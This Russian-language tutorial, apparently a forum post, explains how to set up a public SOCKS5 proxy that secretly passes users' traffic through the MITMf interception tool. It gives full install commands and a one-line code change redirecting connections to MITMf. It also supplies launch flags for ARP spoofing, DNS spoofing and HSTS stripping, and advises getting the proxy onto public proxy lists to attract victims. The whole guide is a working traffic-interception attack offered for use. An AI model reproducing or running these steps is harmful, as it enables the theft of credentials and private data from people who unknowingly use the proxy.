Ниже будет описан пособ сбора данных проходящих через публичный socks5 сервер, который будет запущен на нашей машине. Весь трафик будет пропускаться через MITMf. Всё, что описано ниже, актуально для Debian 8. Атака на HTTPS траффик удается не так часто, но случается. 1. Установка MITMf Code: apt-get update apt-get install unzip make gcc screen git python-pip python-dev pip install --upgrade pip setuptools cd /tmp wget https://github.com/aquynh/capstone/archive/3.0.zip unzip 3.0.zip cd capstone-3.0 make make install cd /opt git clone https://github.com/byt3bl33d3r/MITMf cd MITMf git submodule init && git submodule update –recursive apt-get install python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libffi-dev file pip install -r requirements.txt pip install --upgrade twisted[tls] pip install enum pip install ctutlz Пробуем запустить: Code: python mitmf.py Если видим это, то установка прошла успешно: 2. Создание socks5 сервера. Я взял готовый простой сервер на socks5 на python отсюда: https://github.com/winterfrost/socks5py/blob/master/socks1.py Перед запуском немного модифицируем код, чтобы трафик проходил через mitmf Находим в коде следующую строку: Code: self.dst_s.connect((addr,req.dst_port)) Меняем её на: Code: self.dst_s.connect(('внешний ip', 10000)) 3. Запускаем Запуск socks5 сервера: Code: screen python socks5.py ip 1080 Запуск mitmf Code: screen python mitmf.py -i eth0 --spoof --arp --gateway x.x.x.x --dns --hsts -i - сетевой интерфейс, --gateway - шлюз, можно узнать в выдаче ip r Осталось сделать так, чтобы сокс попал в списки паблик прокси.